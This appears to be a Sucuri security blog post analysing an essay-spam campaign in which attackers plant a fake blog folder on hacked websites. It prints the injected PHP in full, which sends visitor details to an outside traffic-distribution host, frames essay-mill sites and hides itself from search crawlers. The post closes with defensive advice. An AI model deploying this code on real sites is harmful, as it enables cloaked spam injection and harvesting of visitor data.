• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Malicious Subdirectories Strike Again

March 17, 2017Fernando BarbosaEspanolPortugues

FacebookTwitterSubscribe

In a previous post, we illustrated how attackers were fetching information from compromised sites under their control to display spam content on other hacked websites. By adding malicious files into a directory and using the victim’s database structure, attackers were able to inject ads and promote their products.

This time, attackers used a similar technique with a little bit more sophistication to achieve their goals.

Essay Spam Campaign

This technique is now being used to distribute essay spam targeted at students. This type of spam is actually quite common and we’ve seen many strategies being used to propagate it throughout the years.

In this scenario, attackers injected a ./blog folder into the victim’s website, pretending to be a legit blog directory. However, when you try to access it in a browser, it shows an essay website that should not be there:

Essay spam site content

What makes it even more interesting is the fact that every time you reload the page, it shows a completely different essay website.

Essay content after reloading

Malicious Subdirectories

Inside the ./blog folder there are directories full of PHP files with essay-related filenames. Those files share the same following PHP code:

<?php error_reporting( E_ERROR ); $apiKey = '3d62404a441c24f8357d50dd66146bbc';
$campaignId = 'CxFtyM';
$keyword = urlencode('hXXp://infected-website[.]com/blog/path-to-file/file[.]php');
$ua = urlencode($_SERVER['HTTP_USER_AGENT']);
$lang = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
$ip = null;
$headers = array('HTTP_X_FORWARDED_FOR', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_REAL_IP', 'REMOTE_ADDR');
foreach ($headers as $header) {
    if (!empty($_SERVER[$header])) {
        $ip = $_SERVER[$header];
        break;
    }
}
if (strstr($ip, ',')) {
    $tmp = explode(',', $ip);
    if (stristr($_SERVER['HTTP_USER_AGENT'], 'mini')) {
        $ip = trim($tmp[count($tmp) - 2]);
    } else {
        $ip = trim($tmp[0]);
    }
}
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
   $tmp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
   $ip = trim($tmp[0]);
} else {
    $ip = $_SERVER['REMOTE_ADDR'];
}
$referrer = urlencode($_SERVER['HTTP_REFERER']);
$url = "hXXp://gotopplz[.]xyz/tds/api[.]php?action=get&api_key=$apiKey&campaign=$campaignId&ua=$ua&ip=$ip&keyword=$keyword&referrer=$referrer&lang=$lang";
$rCURL = curl_init();
curl_setopt($rCURL, CURLOPT_URL, $url);
curl_setopt($rCURL, CURLOPT_HEADER, 0);
curl_setopt($rCURL, CURLOPT_RETURNTRANSFER, 1);
$aData = curl_exec($rCURL);
curl_close($rCURL);
$result = json_decode ( $aData );
if ($result->redirect) {
  foreach($result->redirect->headers as $header) {
    header($header);
  }
  if ($result->redirect->content) {
     echo $result->redirect->content;
   exit;
  }
}
?>
...

The malicious code gathers information from the visitor, such as:

  • User Agent
  • IP Address
  • Referrer
  • HTTP Accept-Language

The information is then sent to gotopplz[.]xyz, which returns JSON content.

Campaign Tracking

Before going further, it’s very important to note two variables – $apiKey and $campaignId – being sent through that link. The objective of this campaign is ultimately monetary gain, so those variables are probably used to identify the specific campaign and distribute the profits (similar to affiliate tracking).

Here is the JSON returned by gotopplz[.]xyz:

{"stream":{"id":0,"campaign_id":2,"url":"https:\/\/speedypaper.com\/?rt=RSTOKqCq"},
"redirect":{"type":"frame","headers":[],"content":"<html><frameset rows=\"100%\">
<frame src=\"hXXps:\/\/speedypaper[.]com\/?rt=RSTOKqCq\"><\/frameset><\/html>"}}

This will get content from speedypaper[.]com/?rt=RSTOKqCq and display it on the malicious website.

Here are some other websites that can be fetched by the script to display essay content:

  • papercoach[.]net/?rt=bhj3CqYE
  • extraessay[.]com?key_wpg=7e989c5e16fd8da4cdfa23a244128bfa
  • myadmissionsessay[.]com/?pid=3322
  • speedypaper[.]com/?rt=RSTOKqCq

To prevent search engines from seeing the spam content, the script will return a “404 Not Found” error for user agents like Googlebot and MSNbot.

Below the PHP we shared above, there is a full essay HTML page that will be displayed if the script cannot get the desired content from gotopplz[.]xyz. This ensures the content can be displayed even if cURL is disabled on the server.

How to Protect Your Site

Here are some good security practices to protect your website moving forward:

  1. Update your software. This includes your CMS (WordPress, Joomla, etc.), plugins, themes, and server software. Outdated software is the leading cause of website infections and reinfections.
  2. Use strong passwords. From your administrator login page to FTP users, always choose long, complex, and unique passwords for your website management accounts.
  3. Check your core file integrity. Malicious code is often inserted into core files. If you’re using WordPress, you can install our free security plugin which provides a core file integrity check.
  4. Use a Web Application Firewall. A WAF will filter all HTTP/HTTPS traffic between your server and your visitors, blocking known attacks and virtually patching your site even if you forget to update.

If you believe your website has been infected and need specialized assistance in website security to clean and protect your website, let us know.

FacebookTwitterSubscribe

Categories: WordPress SecurityTags: Conditional Malware, Google, Hacked Websites, SEO Spam

About Fernando Barbosa

Fernando Barbosa is a Sucuri's Software Development Manager who joined the company in 2012. Fernando's main responsibilities include leading Sucuri's backend teams and engineering solutions for our suite of security products. His professional experience also covers five years of malware analysis and incident response. When Fernando isn't working, you might find him having good times with his family. Connect with Fernando on Twitter.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.